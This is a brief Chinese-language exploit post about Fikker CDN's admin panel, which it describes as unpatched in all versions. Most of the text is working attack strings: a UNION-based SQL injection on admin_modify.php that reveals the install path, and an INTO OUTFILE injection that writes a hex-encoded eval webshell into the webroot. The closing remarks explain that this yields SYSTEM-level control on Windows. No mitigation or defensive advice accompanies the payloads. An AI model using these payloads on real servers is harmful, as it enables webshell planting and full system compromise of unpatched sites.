Fikker 是一款面向 CDN/站长 的专业级网站缓存（Webcache）和反向代理服务器软件（Reversed Proxy Server）。近日在一起安全事件中发现fikker主控多个php文件存在高危注入漏洞，可获取Webshell to System.

目前官方尚未修復该漏洞。

漏洞级別：严重

影响版本：所有

#爆目录

admin_modify.php?id=-1%20union%20select%201,@@basedir,3,4,5,6,7,8,9,10,11,12,13

##写一句话（目录如果改了，可以通过下面的语句加些/这些让PHP报错）

admin_modify.php?id=1%20and%201=2%20union%20select%200x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E,0x3c3f2f2a,3,4,5,6,7,0x2a2f3f3e,9,10,11,12,13%20into%20outfile%20%27d:/FikkerCDN/webroot/fikcdn/admin/test.php%27

后记:

如果仅仅是注入，也是最多爆爆库啥的，进进后台改改数据之类。但是由於开发人员缺乏安全意识，主控依赖的Apache，MySql等，都是以System权限在Windows 上运行，这意味著只要有注入就可以导出WebShell，只要有Webshell就有System.

作者：hack520

原文：https://zhu.vn/?p=1981